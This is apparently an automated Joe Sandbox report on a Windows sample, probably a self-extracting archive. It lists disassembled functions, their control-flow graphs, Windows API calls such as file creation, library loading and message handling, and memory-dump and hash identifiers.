                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FCAB35
                                                                                                                                                                                              • __freea.LIBCMT ref: 00FCAB42
                                                                                                                                                                                                • Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38
                                                                                                                                                                                              • __freea.LIBCMT ref: 00FCAB4B
                                                                                                                                                                                              • __freea.LIBCMT ref: 00FCAB70
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                              • Opcode ID: 16f85ec7b66646a2ab47e50b7c35b8f87fc94571471512c4dccb0a0b7b668577
                                                                                                                                                                                              • Instruction ID: b4aa0b5dfd9ef857399f538f04cc0d0bda764a4609f6975db8ef970095210476
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f85ec7b66646a2ab47e50b7c35b8f87fc94571471512c4dccb0a0b7b668577
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD51D672A0021BABDB254F64CE47FABB7AAEB84768F15462DFC04D6140DB34EC50E651

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 975 fc3b72-fc3b7c 976 fc3bee-fc3bf1 975->976 977 fc3b7e-fc3b8c 976->977 978 fc3bf3 976->978 980 fc3b8e-fc3b91 977->980 981 fc3b95-fc3bb1 LoadLibraryExW 977->981 979 fc3bf5-fc3bf9 978->979 982 fc3c09-fc3c0b 980->982 983 fc3b93 980->983 984 fc3bfa-fc3c00 981->984 985 fc3bb3-fc3bbc GetLastError 981->985 982->979 987 fc3beb 983->987 984->982 986 fc3c02-fc3c03 FreeLibrary 984->986 988 fc3bbe-fc3bd3 call fc6088 985->988 989 fc3be6-fc3be9 985->989 986->982 987->976 988->989 992 fc3bd5-fc3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00FC3C35,?,?,01002088,00000000,?,00FC3D60,00000004,InitializeCriticalSectionEx,00FD6394,InitializeCriticalSectionEx,00000000), ref: 00FC3C03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                              • API String ID: 3664257935-2084034818
                                                                                                                                                                                              • Opcode ID: c3ec840a4ff450f810a0d76a7dd03aa5ed39ddd932f5df48b401f0337a1a4695
                                                                                                                                                                                              • Instruction ID: dc4c46a01b3631c386055ae9071665cef063e66d560fa1e39392e8cc1815bbb0
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3ec840a4ff450f810a0d76a7dd03aa5ed39ddd932f5df48b401f0337a1a4695
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8112332E05226ABCB228B688D46F4D37A49F457B0F214115F911FB280E330EF00BAD1

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FB0836
                                                                                                                                                                                                • Part of subcall function 00FB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FAF2D8,Crypt32.dll,00000000,00FAF35C,?,?,00FAF33E,?,?,?), ref: 00FB0858
                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00FBAC2F
                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FBAC66
                                                                                                                                                                                              • SHGetMalloc.SHELL32(00FE8438), ref: 00FBAC70
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                                              • String ID: riched20.dll$3Ro
                                                                                                                                                                                              • API String ID: 3498096277-3613677438
                                                                                                                                                                                              • Opcode ID: 284eafb04ec7636ecb2e4b59854f0b2431b05b5f6a11b6c9badc1a7730c4eedf
                                                                                                                                                                                              • Instruction ID: 531181c1efd46a4f2cc074d8fd77c36126b1063998f77e6716581f8af52ff25a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 284eafb04ec7636ecb2e4b59854f0b2431b05b5f6a11b6c9badc1a7730c4eedf
                                                                                                                                                                                              • Instruction Fuzzy Hash: EDF0FFB1900209AFCB11AFAAD8499DFFFFCEF84700F004156A455A2245DBB856059FA1

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 997 fa98e0-fa9901 call fbec50 1000 fa990c 997->1000 1001 fa9903-fa9906 997->1001 1003 fa990e-fa991f 1000->1003 1001->1000 1002 fa9908-fa990a 1001->1002 1002->1003 1004 fa9921 1003->1004 1005 fa9927-fa9931 1003->1005 1004->1005 1006 fa9933 1005->1006 1007 fa9936-fa9943 call fa6edb 1005->1007 1006->1007 1010 fa994b-fa996a CreateFileW 1007->1010 1011 fa9945 1007->1011 1012 fa99bb-fa99bf 1010->1012 1013 fa996c-fa998e GetLastError call fabb03 1010->1013 1011->1010 1014 fa99c3-fa99c6 1012->1014 1016 fa99c8-fa99cd 1013->1016 1022 fa9990-fa99b3 CreateFileW GetLastError 1013->1022 1014->1016 1017 fa99d9-fa99de 1014->1017 1016->1017 1019 fa99cf 1016->1019 1020 fa99ff-fa9a10 1017->1020 1021 fa99e0-fa99e3 1017->1021 1019->1017 1024 fa9a2e-fa9a39 1020->1024 1025 fa9a12-fa9a2a call fb0602 1020->1025 1021->1020 1023 fa99e5-fa99f9 SetFileTime 1021->1023 1022->1014 1026 fa99b5-fa99b9 1022->1026 1023->1020 1025->1024 1026->1014
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00FA7760,?,00000005,?,00000011), ref: 00FA995F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00FA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA996C
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00FA7760,?,00000005,?), ref: 00FA99A2
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00FA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA99AA
                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA99F9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                              • Opcode ID: 069974f70d9ea48f7cc7028c595a59fb40cd56084f7baf173e76771ba2ffe870
                                                                                                                                                                                              • Instruction ID: feb5d8c4341cb618ced64b54bd2c7fefb111623065e14d3e685cf1eef9db305b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 069974f70d9ea48f7cc7028c595a59fb40cd56084f7baf173e76771ba2ffe870
                                                                                                                                                                                              • Instruction Fuzzy Hash: 373115B09483457FE7209B24CC46BDBBB94BB4A330F100B2DF5A1961D1D7E49944EB91

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1056 fbb568-fbb581 PeekMessageW 1057 fbb5bc-fbb5be 1056->1057 1058 fbb583-fbb597 GetMessageW 1056->1058 1059 fbb599-fbb5a6 IsDialogMessageW 1058->1059 1060 fbb5a8-fbb5b6 TranslateMessage DispatchMessageW 1058->1060 1059->1057 1059->1060 1060->1057
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
                                                                                                                                                                                              • IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00FBB5AC
                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00FBB5B6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1266772231-0
                                                                                                                                                                                              • Opcode ID: 6b337f5cfb64b70356a24c7f97405a94675e5c8352095da98ae5fc768b44b0a3
                                                                                                                                                                                              • Instruction ID: 571190efd6e472f02562901baaa0757da3804ed226fc9db5a54917ffe06719aa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b337f5cfb64b70356a24c7f97405a94675e5c8352095da98ae5fc768b44b0a3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 19F0BD71E0211AABCB31EBE6AC4CDDB7FBCEE052A1B044415B549D6044EB78D505CBB1

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1061 fbabab-fbabca GetClassNameW 1062 fbabcc-fbabe1 call fb1fbb 1061->1062 1063 fbabf2-fbabf4 1061->1063 1068 fbabe3-fbabef FindWindowExW 1062->1068 1069 fbabf1 1062->1069 1064 fbabff-fbac01 1063->1064 1065 fbabf6-fbabf9 SHAutoComplete 1063->1065 1065->1064 1068->1069 1069->1063
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00FBABC2
                                                                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00FBABF9
                                                                                                                                                                                                • Part of subcall function 00FB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FAC116,00000000,.exe,?,?,00000800,?,?,?,00FB8E3C), ref: 00FB1FD1
                                                                                                                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FBABE9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                              • String ID: EDIT
                                                                                                                                                                                              • API String ID: 4243998846-3080729518
                                                                                                                                                                                              • Opcode ID: 64c7aada73f2d981c6676e0e57ec00b56abc82021673a345a3d85b9726aea05d
                                                                                                                                                                                              • Instruction ID: 55b1fb9f6302c593990814e9fd700234305a1604786f909591c5ada06e950907
                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c7aada73f2d981c6676e0e57ec00b56abc82021673a345a3d85b9726aea05d
                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF02732B012287BDB3197359C09FDB726CAF82B50F488012BA44F71C4D766ED41DAB6

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1070 fbdbde-fbdc09 call fbec50 SetEnvironmentVariableW call fb0371 1074 fbdc0e-fbdc12 1070->1074 1075 fbdc36-fbdc38 1074->1075 1076 fbdc14-fbdc18 1074->1076 1077 fbdc21-fbdc28 call fb048d 1076->1077 1080 fbdc1a-fbdc20 1077->1080 1081 fbdc2a-fbdc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FBDBF4
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FBDC30
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                                                                                                              • Opcode ID: 419218154deef2af31a404891548d6c44c731ea0aa39b6ec2dc8c4f0aa9f9583
                                                                                                                                                                                              • Instruction ID: d285dbc0a1e46669a704ef4e6976ccd08112d17fbde9d203e49dd805317f1a22
                                                                                                                                                                                              • Opcode Fuzzy Hash: 419218154deef2af31a404891548d6c44c731ea0aa39b6ec2dc8c4f0aa9f9583
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF0ECF2805239A7CB202F968C06FFB3F9DAF05B91B040412BD8595151E6B4C940FEB2

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1082 fa9785-fa9791 1083 fa979e-fa97b5 ReadFile 1082->1083 1084 fa9793-fa979b GetStdHandle 1082->1084 1085 fa9811 1083->1085 1086 fa97b7-fa97c0 call fa98bc 1083->1086 1084->1083 1087 fa9814-fa9817 1085->1087 1090 fa97d9-fa97dd 1086->1090 1091 fa97c2-fa97ca 1086->1091 1093 fa97ee-fa97f2 1090->1093 1094 fa97df-fa97e8 GetLastError 1090->1094 1091->1090 1092 fa97cc 1091->1092 1098 fa97cd-fa97d7 call fa9785 1092->1098 1096 fa980c-fa980f 1093->1096 1097 fa97f4-fa97fc 1093->1097 1094->1093 1095 fa97ea-fa97ec 1094->1095 1095->1087 1096->1087 1097->1096 1099 fa97fe-fa9807 GetLastError 1097->1099 1098->1087 1099->1096 1101 fa9809-fa980a 1099->1101 1101->1098
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00FA9795
                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00FA97AD
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00FA97DF
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00FA97FE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                              • Opcode ID: 1063551293827f25e5b0bb6623dfe1816603826ac1ed7df405f144970469d047
                                                                                                                                                                                              • Instruction ID: 54822142ebeca13da143ceaf27076150a96bdfc16d99fb0552cd478d5cd1868a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1063551293827f25e5b0bb6623dfe1816603826ac1ed7df405f144970469d047
                                                                                                                                                                                              • Instruction Fuzzy Hash: A11170B5918204EBDF205F64C80466937A9BF43734F60863AE51685190D7F89E44FB62
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FC3F73,00000000,00000000,?,00FCACDB,00FC3F73,00000000,00000000,00000000,?,00FCAED8,00000006,FlsSetValue), ref: 00FCAD66
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00FCACDB,00FC3F73,00000000,00000000,00000000,?,00FCAED8,00000006,FlsSetValue,00FD7970,FlsSetValue,00000000,00000364,?,00FC98B7), ref: 00FCAD72
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FCACDB,00FC3F73,00000000,00000000,00000000,?,00FCAED8,00000006,FlsSetValue,00FD7970,FlsSetValue,00000000), ref: 00FCAD80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                              • Opcode ID: d4d98372e1032fb8a737b2cc1234c7925246a2ce14b74f350ec693b2491464a2
                                                                                                                                                                                              • Instruction ID: fee06f08bf0fdc1125fca914dc1aa03b4eee83faf4c996c18998d1f79e4d9de0
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4d98372e1032fb8a737b2cc1234c7925246a2ce14b74f350ec693b2491464a2
                                                                                                                                                                                              • Instruction Fuzzy Hash: C4014732A0222FABC7314B78AC49F577B58EF00BB77100229F907D3650DB21EC01A6E2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00FAD343,00000001,?,?,?,00000000,00FB551D,?,?,?), ref: 00FA9F9E
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00FB551D,?,?,?,?,?,00FB4FC7,?), ref: 00FA9FE5
                                                                                                                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00FAD343,00000001,?,?), ref: 00FAA011
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite$Handle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4209713984-0
                                                                                                                                                                                              • Opcode ID: 6c53e5b88285ff914f61521783d92017971d804102a4b8b2a1c8923169c576dd
                                                                                                                                                                                              • Instruction ID: 1c1548c3efc60d60601217535d5d1ba1fc12d9f2402c674a039ea5dc087bf513
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c53e5b88285ff914f61521783d92017971d804102a4b8b2a1c8923169c576dd
                                                                                                                                                                                              • Instruction Fuzzy Hash: A531F3B2608305AFDB14CF20D808B6E77A6FF86725F04452DF98197290C775AD48EBA3
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FAC27E: _wcslen.LIBCMT ref: 00FAC284
                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA2D9
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA30C
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA329
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
